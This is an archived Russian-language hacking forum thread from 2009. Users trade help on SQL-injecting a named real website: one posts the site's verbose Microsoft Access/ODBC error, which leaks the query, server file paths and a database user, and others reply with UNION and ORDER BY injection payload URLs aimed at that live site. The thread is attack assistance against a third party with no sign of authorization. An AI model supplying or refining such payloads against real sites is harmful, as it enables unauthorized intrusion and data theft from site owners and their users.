ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
10.11.2009, 02:17
|
|
Участник форума
Регистрация: 25.04.2007
Сообщений: 176
Провел на форуме:
1957988
Репутация:
739
|
|
если нету доступа к msysobjects,а так обычно и бывает,то только подбирать наугад таблицы.Можно ещё попробывать как здесь http://forum.antichat.ru/showpost.php?p=523825&postcount=36
|
|
|
10.11.2009, 02:37
|
|
Постоянный
Регистрация: 18.02.2008
Сообщений: 368
Провел на форуме:
4075418
Репутация:
386
|
|
что значит налету? если огнелисом пользуешься то есть соответсвующий плугин. (модификация http заголовков)
т.е. например есть флешка она отсылает гет запрос примерно такого вида http://localhost/gate.php?test=asdfg так вот в тот момент как она его отсылает мне надо поправить значение test. Пробывал тампер дату но как оказалось она такое неумеет, а ты про какой плагин говорил?
|
|
|
|
10.11.2009, 02:39
|
|
Новичок
Регистрация: 07.11.2009
Сообщений: 23
Провел на форуме:
189458
Репутация:
10
|
|
Сообщение от warlok
т.е. например есть флешка она отсылает гет запрос примерно такого вида http://localhost/gate.php?test=asdfg так вот в тот момент как она его отсылает мне надо поправить значение test. Пробывал тампер дату но как оказалось она такое неумеет, а ты про какой плагин говорил?
плагин для фф - Charles
|
|
|
|
10.11.2009, 07:53
|
|
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
Провел на форуме:
556476
Репутация:
66
|
|
не могу раскрутит дальше
Код:
http://wallstreetcorner.com:80/ss2.html?Symbol='
можеть кто поможеть?
выдает:
Код:
An error occurred processing your request
Merging data into macro form: e:\cyberspace\wallstreetcorner\ss2.html
WebBase ODBC error in: {sql to Special source 'clients' user 'admin'}
**ODBC/driver/database error in sql statement:
{sql to Special source 'clients' user 'admin'}
SELECT * FROM Situations WHERE Symbol = ''' ORDER BY ID
{/sql}
Using cached connection:: 'clients'/'admin'/' ' ('Microsoft Access Driver (*.mdb)' SYN 3804 11/09/09 21:16:35 EST 11/09/09 22:49:17 EST +1:32:42 0)
ODBC API call: 'statement executeDirect:' returned the following error message: '
{execDirect}[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression 'Symbol = ''' ORDER BY ID'. (sqlState: 37000)
SELECT * FROM Situations WHERE Symbol = ''' ORDER BY ID
WebBase ODBC (EwXx08.120@Windows 2000 5.0) **
In file: e:\cyberspace\wallstreetcorner\ss2.html
inserted by: e:\cyberspace\wallstreetcorner\disclaimer.html ;; near line number 6
;; following starts near line number 7 in your source form...
...
{set Iaccept 'YES'}
{setUser userIaccept Iaccept}
{sql to Special source 'clients' user 'admin'}
SELECT * FROM Situations WHERE Symbol = '{Symbol}'
ORDER BY ID
{/sql}
{forRow aRow on Special max 1}
...
**
|
|
|
|
10.11.2009, 12:42
|
|
Banned
Регистрация: 14.01.2009
Сообщений: 515
Провел на форуме:
1996429
Репутация:
468
|
|
MSSQL вроде, но что за дурацкая реакция на ошибку???
Кто знает?
не всегда же так.обчно просто строчка...ошибка там та и все.
Что имеем?
Тип БД - MSSQL
Раскрытие путей - e:\cyberspace\wallstreetcorner\disclaimer.html
запрос к бд - SELECT * FROM Situations WHERE Symbol = '11111111111'' ORDER BY ID
при Symbol=11111111111'
+ EwXx08.120@Windows 2000 5.0)
смотри как инекции проводить в mssql
гыгы сайт то не пашет http://wallstreetcorner.com/ss2.htm
и даже при http://wallstreetcorner.com/ss2.html?Symbol=1 ошибка)
Последний раз редактировалось Krist_ALL; 10.11.2009 в 12:46..
|
|
|
|
10.11.2009, 12:45
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
Сообщение от Krist_ALL
смотри как инекции проводить в mssql
Microsoft Access Driver
|
|
|
|
10.11.2009, 12:46
|
|
Участник форума
Регистрация: 18.07.2009
Сообщений: 272
Провел на форуме:
2083691
Репутация:
330
|
|
Сообщение от Krist_ALL
MSSQL вроде, но что за дурацкая реакция на ошибку???
Кто знает?
не всегда же так.обчно просто строчка...ошибка там та и все.
Что имеем?
Тип БД - MSSQL
Раскрытие путей - e:\cyberspace\wallstreetcorner\disclaimer.html
запрос к бд - SELECT * FROM Situations WHERE Symbol = '11111111111'' ORDER BY ID
при Symbol=11111111111'
смотри как инекции проводить в mssql
Какой mssql??
ODBC API call: 'statement executeDirect:' returned the following error message: '
{execDirect}[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression 'Symbol = ''' ORDER BY ID'. (sqlState: 37000)
SELECT * FROM Situations WHERE Symbol = ''' ORDER BY ID
При чем здесь MSSQL ?
|
|
|
|
10.11.2009, 15:52
|
|
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
Провел на форуме:
556476
Репутация:
66
|
|
Сообщение от Krist_ALL
MSSQL вроде, но что за дурацкая реакция на ошибку???
Кто знает?
не всегда же так.обчно просто строчка...ошибка там та и все.
Что имеем?
Тип БД - MSSQL
Раскрытие путей - e:\cyberspace\wallstreetcorner\disclaimer.html
запрос к бд - SELECT * FROM Situations WHERE Symbol = '11111111111'' ORDER BY ID
при Symbol=11111111111'
+ EwXx08.120@Windows 2000 5.0)
смотри как инекции проводить в mssql
гыгы сайт то не пашет http://wallstreetcorner.com/ss2.htm
и даже при http://wallstreetcorner.com/ss2.html?Symbol=1 ошибка)
я уже пробовал стандартные методы инъекций
Код:
http://wallstreetcorner.com/disclaimer.html?Symbol=' пашет
|
|
|
|
10.11.2009, 16:19
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
Провел на форуме:
14023893
Репутация:
2163
|
|
http://wallstreetcorner.com/disclaimer.html?Symbol='+order+by+45,46,47,48,49,5 0+union+select+1+from+Situations+where+'1
& use https://forum.antichat.ru/thread50550.html
/add краткость сестра таланта:
http://wallstreetcorner.com/disclaimer.html?Symbol='order+by+47%00
Последний раз редактировалось l1ght; 10.11.2009 в 16:34..
|
|
|
|
10.11.2009, 19:48
|
|
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
Провел на форуме:
556476
Репутация:
66
|
|
Сообщение от l1ght
http://wallstreetcorner.com/disclaimer.html?Symbol='+order+by+45,46,47,48,49,5 0+union+select+1+from+Situations+where+'1
& use https://forum.antichat.ru/thread50550.html
/add краткость сестра таланта:
http://wallstreetcorner.com/disclaimer.html?Symbol='order+by+47%00
спс |1ght я уже много раз прочитал ту статью. Твой линк помоему ничего не изменил вроде. Неужели от явного скуля нельзя что то делать?
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [Forest]](/avatars/avatar103206.jpg?1675254){kind=avatar}
Похожие темы
Комбинированный вид
